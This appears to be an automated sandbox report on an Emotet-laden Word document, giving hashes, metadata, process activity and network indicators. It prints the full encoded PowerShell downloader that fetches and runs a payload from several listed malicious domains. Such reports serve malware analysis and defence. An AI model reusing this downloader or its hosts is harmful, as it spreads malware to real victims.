File name: | Dane_018218349_17693052648.doc |
Full analysis: | https://app.any.run/tasks/8dc770f5-dcf1-4b5e-a619-b78e13fe2dc1 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 19:22:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Johnpaul Altenwerth, Template: Normal.dotm, Last Saved By: Jayden Hoeger, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 26 10:19:00 2019, Last Saved Time/Date: Thu Sep 26 10:19:00 2019, Number of Pages: 1, Number of Words: 86, Number of Characters: 492, Security: 0 |
MD5: | 7575884DE9A0491014ACDB73A32574BB |
SHA1: | 8E49ABB56812A55753A657953F02DDD87509AB23 |
SHA256: | 825E640864016505F9AF61D726238C843208F030F91D515D04DDCA2EB386EFBD |
SSDEEP: | 3072:S4XYSrr+wnD0YIjBsV5n21b6RS62Yzs3MFAYxPxTqf7p1UMGQb9YZi:S4XYSrr+wnD0YIjBsV5n21bwSAs3MRPc |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Johnpaul Altenwerth |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | Jayden Hoeger |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:26 09:19:00 |
ModifyDate: | 2019:09:26 09:19:00 |
Pages: | 1 |
Words: | 86 |
Characters: | 492 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 577 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2132 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Dane_018218349_17693052648.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3704 | powershell -enco JABGAGEAYwB0AG8AcgBzAGkAYQBhAD0AJwBUAEgAWABqAGkAYwAnADsAJABDAHIAZQBkAGkAdABfAEMAYQByAGQAXwBBAGMAYwBvAHUAbgB0AGwAbgBsACAAPQAgACcANQAwADcAJwA7ACQAcwB0AHIAYQB0AGUAZwBpAHoAZQBvAGYAdgA9ACcATgBhAHQAaQBvAG4AYQBsAGEAbgBpACcAOwAkAE0AdQBzAGkAYwBtAGYAYwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwByAGUAZABpAHQAXwBDAGEAcgBkAF8AQQBjAGMAbwB1AG4AdABsAG4AbAArACcALgBlAHgAZQAnADsAJAB0AHUAcgBxAHUAbwBpAHMAZQB6AHIAZgA9ACcAYwBvAG0AcABsAGUAeABpAHQAeQB3AHoAdgAnADsAJABGAGwAbwByAGkAZABhAGgAdwBhAD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAagBlAGMAdAAnACkAIABOAEUAVAAuAHcARQBiAEMATABpAEUATgB0ADsAJAB3AGkAdABoAGQAcgBhAHcAYQBsAHoAdwBpAD0AJwBoAHQAdABwADoALwAvAGMAaABlAGEAcAB0AHIAYQBpAG4AdABpAGMAawBlAHQALgBjAG8AZwBiAGkAegAtAGkAbgBmAG8AdABlAGMAaAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADkAdgBzAHgANABnADYAbABfAHAANQB4ADIAOQBjAG8ALQA0ADMANwAzADEANwA5ADUALwBAAGgAdAB0AHAAOgAvAC8AZwBzAGYAYwBsAG8AdQBkAC4AYwBvAG0ALwBmAGkAcgAvAHEAeAA4ADgAYgAwAHEAZwBmAHEAXwB0AGQAcABmAG0AbwBiAGUAeABmAC0AOAA4ADEAOAAyADkAMAAxADIALwBAAGgAdAB0AHAAOgAvAC8AZgBhAGIAaQBvAGcAdQB0AGkAZQByAHIAZQB6AC4AYwBvAG0ALgBiAHIALwBsAG8AagBhAC8AYgBFAFoAWQB0AEwAawBKAEcAagAvAEAAaAB0AHQAcAA6AC8ALwBnAHIAdQBhAHMAYQBzAHUAcwBlAHIAdgBpAGMAaQBvAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AWQBkAEYAbQBMAEkARQBzAEkAQgAvAEAAaAB0AHQAcAA6AC8ALwBpAHQAZgAuAHAAYQBsAGUAbQBpAHkAYQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ASQBJAHMAdwBiAGwATwBDAFYALwAnAC4AIgBTAGAAcABsAGkAdAAiACgAJwBAACcAKQA7ACQARwByAGUAZQBuAG4AYQBrAD0AJwBvAHIAYQBuAGcAZQB2AHYAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwBwAGUAYwBpAGEAbABpAHMAdAB2AGwAZgAgAGkAbgAgACQAdwBpAHQAaABkAHIAYQB3AGEAbAB6AHcAaQApAHsAdAByAHkAewAkAEYAbABvAHIAaQBkAGEAaAB3AGEALgAiAEQATwBgAFcATgBsAG8AYQBgAEQAZgBpAGwARQAiACgAJABTAHAAZQBjAGkAYQBsAGkAcwB0AHYAbABmACwAIAAkAE0AdQBzAGkAYwBtAGYAYwApADsAJABvAHIAYwBoAGkAZABpAHMAZAA9ACcAQwBoAGUAYwBrAGkAbgBnAF8AQQBjAGMAbwB1AG4AdABhAGgAcwAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAE0AdQBzAGkAYwBtAGYAYwApAC4AIgBMAEUAYABOAEcAVABIACIAIAAtAGcAZQAgADMANgAzADAANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAHIAdAAiACgAJABNAHUAcwBpAGMAbQBmAGMAKQA7ACQAbQBpAHMAcwBpAG8AbgBjAHIAaQB0AGkAYwBhAGwAagB3AGYAPQAnAEIAZQByAGsAcwBoAGkAcgBlAHYAYgBqACcAOwBiAHIAZQBhAGsAOwAkAGQAZQBwAG8AcwBpAHQAagByAGkAPQAnAFIAdQBiAGIAZQByAHUAaQByACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEAYwBjAGUAcwBzAGgAaABvAD0AJwBvAG4AZQB0AG8AbwBuAGUAbgBqAGoAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA775.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15E4FBD3.wmf | wmf | |
MD5:A8C9CD2EEB2E479304885EA609AC5E10 | SHA256:9DE482E540183EA6DE08D3C1B4576FB5D954CB5C99DE0A6AFCAC4740DDCC7051 | |||
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\576CE5BD.wmf | wmf | |
MD5:7EBBA99FD8E30E47CF93C52E511F20B1 | SHA256:85316599A19AC6CCBF50DB112C3E53448F46F06871AF9BFBEBA6E29F4676C444 | |||
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7DC05D4.wmf | wmf | |
MD5:9D88D64DF422DA83102EA776DCFEA002 | SHA256:BC937A021270E56F53B41A6B630A06EEDCE536B16B7368F8BDA2EC5489201EFB | |||
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\480F6F1B.wmf | wmf | |
MD5:3898EA9DC7ABE445E58DDF552A7CEED4 | SHA256:B1E27AA7F41A6D597F231EA637C799AA438117D734E4E5AC46CB03650FDFB2CA | |||
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D91F72E1.wmf | wmf | |
MD5:5735E745EB82E87115020986E9869640 | SHA256:4B5FA4E3C0F9494B6B74C51412CC7B28123821797C7A4042B6D31FFA563729FC | |||
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9EB7859.wmf | wmf | |
MD5:FFF27C205F166D32013D581E589EA5C6 | SHA256:1B635CF2C96D6F58840749C8601DFF66D002A94BB0B9A625559E47B98FBDF406 | |||
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB5D1897.wmf | wmf | |
MD5:1868096D39C561CF4182F1726F02B7DD | SHA256:B693E6C79617BF16BA6392BA9ACA3AF0BBC8F41079F42BFD272EDF48BF2D9C5A | |||
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E43D4CF.wmf | wmf | |
MD5:45463D405E55447D217B8A13A4B225A7 | SHA256:531D64249C5532AE309124D2AA3A642B9697813B3A5483020D477768A04FF6AD | |||
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8734884.wmf | wmf | |
MD5:81670EFCBDF065FD0D40D040ADBEB888 | SHA256:037E53B4949F0E527A340E98F252A93D954A1C933E86D6362AB3DABE47D94A00 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3704 | powershell.exe | GET | 200 | 104.27.164.253:80 | http://fabiogutierrez.com.br/loja/bEZYtLkJGj/ | US | html | 3.97 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3704 | powershell.exe | 104.27.164.253:80 | fabiogutierrez.com.br | Cloudflare Inc | US | shared |
3704 | powershell.exe | 120.77.84.124:80 | gsfcloud.com | Hangzhou Alibaba Advertising Co.,Ltd. | CN | suspicious |
Domain | IP | Reputation |
---|---|---|
cheaptrainticket.cogbiz-infotech.com |
| malicious |
gsfcloud.com |
| suspicious |
fabiogutierrez.com.br |
| suspicious |
gruasasuservicio.com |
| unknown |
itf.palemiya.com |
| malicious |